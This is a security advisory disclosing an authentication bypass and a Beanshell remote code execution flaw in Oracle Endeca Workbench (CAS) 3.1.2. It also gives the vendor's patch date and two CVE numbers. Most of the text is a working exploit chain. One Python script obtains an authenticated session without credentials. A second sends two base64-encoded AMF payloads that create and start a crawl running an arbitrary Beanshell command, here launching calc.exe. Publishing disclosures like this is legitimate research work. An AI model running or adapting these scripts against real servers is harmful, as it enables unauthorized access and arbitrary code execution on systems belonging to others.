SSD Advisory – Oracle Endeca Workbench (CAS) Beanshell Script Remote Code Execution / Session Generation Authentication Bypass

SecuriTeam Secure Disclosure
SecuriTeam Secure Disclosure (SSD) provides the support you need to turn your experience uncovering security vulnerabilities into a highly paid career. SSD was designed by researchers for researchers and will give you the fast response and great support you need to make top dollar for your discoveries.
Introduction
Oracle Endeca‘s Web (now called Oracle Commerce Guided Search/Experience Manager Documentation) commerce solution enables your company to deliver a personalized, consistent customer buying experience across all channels — online, in-store, mobile, or social. Whenever and wherever customers engage with your business, the Oracle Endeca Web commerce solution delivers, analyzes, and targets just the right content to just the right customer to encourage clicks and drive business results.
Vulnerability Details
A vulnerability in the session generation mechanism allows unauthenticated users to get “authenticated” status by accessing a page with certain parameters. A vulnerability in the /casconsole/messagebroker/amf file allows attackers that can generate a custom Action Message Format (AMF) file to cause the remote server to execute arbitrary code.

Vulnerable Version
Oracle Endeca Workbench (CAS) version 3.1.2.797565
Session Generation Authentication Bypass
Sample Run of the PoC
poc-authbypass

#!/usr/bin/python
#
import requests
import sys
import re
# incase you want a proxy
http_proxy  = "http://127.0.0.1:8080"
proxy = {"http" : http_proxy}
def header():
    header = """
    Oracle Endeca Workbench (CAS) v3.1.2.797565 Session Generation Authentication Bypass
    x 2014
    """
    return header
if len(sys.argv) <= 1:
    print header()
    print "usage: %s [target]" % (sys.argv[0])
    print "eg: %s 192.168.51.130" % (sys.argv[0])
    sys.exit(1)
target = sys.argv[1]
print header()
print "(+) Generating a remote sessionid..."
url = "http://%s:8006/casconsole/?timestamp=1&auth=90" % target
r = requests.head(url, proxies=proxy)
match = re.search("ESESSIONID=(.*); Path=/casconsole", r.headers['set-cookie'])
if match:
    print "(+) Great! we have a session: %s" % match.group(1)

Remote Code Execution Vulnerability
Sample Run of the PoC
poc-rce

#!/usr/bin/python
#
import requests
import sys
from re import search
from os import system
def header():
    header = """
    Oracle Endeca Workbench (CAS) v3.1.2.797565 Beanshell Script Remote Code Execution
    x 2014
    """
    return header
if len(sys.argv) <= 2:
    print header()
    print "usage: %s [target] [sessionid]" % (sys.argv[0])
    print "eg: %s 192.168.51.130 E78A2028CC999F917B2BF984E1410CA7" % (sys.argv[0])
    sys.exit(1)
# incase you want a proxy
http_proxy  = "http://127.0.0.1:8080"
proxy = {"http" : http_proxy}
s = requests.session()
target    = sys.argv[1]
sessionid = sys.argv[2]
print header()
url = "http://%s:8006/casconsole/messagebroker/amf" % target
headers = { 'Content-Type': 'application/x-amf',                         # AMF content type
            'Cookie': 'ESESSIONID=%s' % sessionid,     # this is the session ID we generated
          }
stage1 = open('amf_stage1.dat', 'r')
post_s1 = stage1.read()
stage1.close()
print "(+) Sending our Stage1 SOAPMessage via amf"
r = requests.post(url, data=post_s1, headers=headers, proxies=proxy)
# we created the crawl
if search("createCrawlResponse", r.text):
    print "(+) Successfully created the remote datasource using a SOAPMessage via amf"
    stage2 = open('amf_stage2.dat', 'r')
    post_s2 = stage2.read()
    stage2.close()
    print "(+) Sending our Stage2 SOAPMessage via amf"
    r = requests.post(url, data=post_s2, headers=headers, proxies=proxy)
    # we started our code
    if search("startCrawlResponse", r.text):
        print "(+) Successfully started calc.exe using a SOAPMessage via amf"
AAMAAAABAARudWxsAAMvMjEAAAZZCgAAAAERCoFDR2ZsZXgubWVzc2FnaW5nLm1lc3NhZ2VzLlNP
QVBNZXNzYWdlDW1ldGhvZBdodHRwSGVhZGVycxdjb250ZW50VHlwZRtyZWNvcmRIZWFkZXJzB3Vy
bBV0aW1lVG9MaXZlCWJvZHkRY2xpZW50SWQXZGVzdGluYXRpb24TbWVzc2FnZUlkE3RpbWVzdGFt
cA9oZWFkZXJzBglQT1NUCgsBFVNPQVBBY3Rpb24GBSIiAQYvdGV4dC94bWw7IGNoYXJzZXQ9dXRm
LTgCBjNodHRwOi8vU1RFVkUtUEM6ODUwMC9jYXMvBAAGkwM8U09BUC1FTlY6RW52ZWxvcGUgeG1s
bnM6U09BUC1FTlY9Imh0dHA6Ly9zY2hlbWFzLnhtbHNvYXAub3JnL3NvYXAvZW52ZWxvcGUvIiB4
bWxuczp4c2Q9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hIiB4bWxuczp4c2k9Imh0
dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hLWluc3RhbmNlIj48U09BUC1FTlY6Qm9keT48
Y3JlYXRlQ3Jhd2wgeG1sbnM9Imh0dHA6Ly9lbmRlY2EuY29tL2l0bC9jYXMvMjAxMS0xMiI+PGNy
YXdsQ29uZmlnPjxjcmF3bElkPjxpZD50ZXN0PC9pZD48L2NyYXdsSWQ+PHNvdXJjZUNvbmZpZz4N
CgkJCQkJPG1vZHVsZUlkPg0KCQkJCQkJPGlkPkZpbGUgU3lzdGVtPC9pZD4NCgkJCQkJPC9tb2R1
bGVJZD4NCgkJCTxtb2R1bGVQcm9wZXJ0aWVzPjxtb2R1bGVQcm9wZXJ0eT48a2V5PnNlZWRzPC9r
ZXk+PHZhbHVlPmM6XDwvdmFsdWU+PC9tb2R1bGVQcm9wZXJ0eT48bW9kdWxlUHJvcGVydHk+PGtl
eT5leHBhbmRBcmNoaXZlczwva2V5Pjx2YWx1ZT5mYWxzZTwvdmFsdWU+PC9tb2R1bGVQcm9wZXJ0
eT48bW9kdWxlUHJvcGVydHk+PGtleT5nYXRoZXJOYXRpdmVGaWxlUHJvcGVydGllczwva2V5Pjx2
YWx1ZT50cnVlPC92YWx1ZT48L21vZHVsZVByb3BlcnR5PjwvbW9kdWxlUHJvcGVydGllcz4NCgkJ
CTwvc291cmNlQ29uZmlnPjx0ZXh0RXh0cmFjdGlvbkNvbmZpZz48ZW5hYmxlZD50cnVlPC9lbmFi
bGVkPjxtYWtlTG9jYWxDb3B5PmZhbHNlPC9tYWtlTG9jYWxDb3B5PjwvdGV4dEV4dHJhY3Rpb25D
b25maWc+PG1hbmlwdWxhdG9yQ29uZmlncz48bWFuaXB1bGF0b3JDb25maWc+DQoJCQkJCTxtb2R1
bGVJZD4NCgkgICAgICAgICAgCQkJPGlkPmNvbS5lbmRlY2EuY2FzLm1hbmlwdWxhdG9yLk1vZGlm
aWVyU2NyaXB0TWFuaXB1bGF0b3I8L2lkPg0KCSAgICAgICAgCQk8L21vZHVsZUlkPg0KCQkJCQk8
bW9kdWxlUHJvcGVydGllcz48bW9kdWxlUHJvcGVydHk+PGtleT5zY3JpcHRTb3VyY2U8L2tleT48
dmFsdWU+ZXhlYygiY2FsYy5leGUiKTs8L3ZhbHVlPjwvbW9kdWxlUHJvcGVydHk+PC9tb2R1bGVQ
cm9wZXJ0aWVzPg0KCQkJCQk8aWQ+c2k8L2lkPg0KCQkJCQk8ZW5hYmxlZD50cnVlPC9lbmFibGVk
Pg0KCQkJCTwvbWFuaXB1bGF0b3JDb25maWc+PC9tYW5pcHVsYXRvckNvbmZpZ3M+PC9jcmF3bENv
bmZpZz48L2NyZWF0ZUNyYXdsPjwvU09BUC1FTlY6Qm9keT48L1NPQVAtRU5WOkVudmVsb3BlPgZJ
MUVFNTdGQjYtMEEwOS1BQ0RDLUY2MTAtQjYxQTE5ODcyMTAyBiFodHRwLWRlc3RpbmF0aW9uBklD
NDRFODEwRS00RDc5LTczNDAtQkE0RC05OEJFNUE1NTcxRTYEAAoFFURTRW5kcG9pbnQGF2FtZi1j
aGFubmVsCURTSWQGSTFFRTU3NjBBLTc0MUQtRTUwQi1FRDI2LTIzNDdBMzY4NjJCMgE=
AAMAAAABAARudWxsAAMvMjQAAALfCgAAAAERCoFDR2ZsZXgubWVzc2FnaW5nLm1lc3NhZ2VzLlNP
QVBNZXNzYWdlDW1ldGhvZBdodHRwSGVhZGVycxdjb250ZW50VHlwZRtyZWNvcmRIZWFkZXJzB3Vy
bBV0aW1lVG9MaXZlCWJvZHkRY2xpZW50SWQXZGVzdGluYXRpb24TbWVzc2FnZUlkE3RpbWVzdGFt
cA9oZWFkZXJzBglQT1NUCgsBFVNPQVBBY3Rpb24GBSIiAQYvdGV4dC94bWw7IGNoYXJzZXQ9dXRm
LTgCBjNodHRwOi8vU1RFVkUtUEM6ODUwMC9jYXMvBAAGhQ88U09BUC1FTlY6RW52ZWxvcGUgeG1s
bnM6U09BUC1FTlY9Imh0dHA6Ly9zY2hlbWFzLnhtbHNvYXAub3JnL3NvYXAvZW52ZWxvcGUvIiB4
bWxuczp4c2Q9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hIiB4bWxuczp4c2k9Imh0
dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hLWluc3RhbmNlIj48U09BUC1FTlY6Qm9keT48
c3RhcnRDcmF3bCB4bWxucz0iaHR0cDovL2VuZGVjYS5jb20vaXRsL2Nhcy8yMDExLTEyIj48Y3Jh
d2xJZD48aWQ+dGVzdDwvaWQ+PC9jcmF3bElkPjwvc3RhcnRDcmF3bD48L1NPQVAtRU5WOkJvZHk+
PC9TT0FQLUVOVjpFbnZlbG9wZT4GSTFFRjFEQjRCLUY4MEMtMDlENy0yRjI1LUIyRjBBNTI2MTA4
MwYhaHR0cC1kZXN0aW5hdGlvbgZJNUE5RTQ1QjktQ0QwRS1GMkQxLUM2MTctOThDMzQzRjM2NkVE
BAAKBRVEU0VuZHBvaW50BhdhbWYtY2hhbm5lbAlEU0lkBkkxRUYxRDE3OS01MjI4LTRBNTAtMzIz
Ni0xMzE2Njk1RjIyRkIB

Vendor Response

The following issues reported by you are fixed in the upcoming Critical Patch Update, due to be released at 1:00 PM, U.S. Pacific Time, on July 14, 2015. We ask that any information that you plan to publish regarding these issues be released after this date and time.
This Critical Patch Update will contain fixes for the following issues:
S0540546 ENDECA WORKBENCH REMOTE CODE EXECUTION
S0540533 ENDECA WORKBENCH AUTHENTICATION BYPASS

CVE
Two CVEs have been assigned to these two vulnerabilities, CVE-2015-2653 and CVE-2015-2607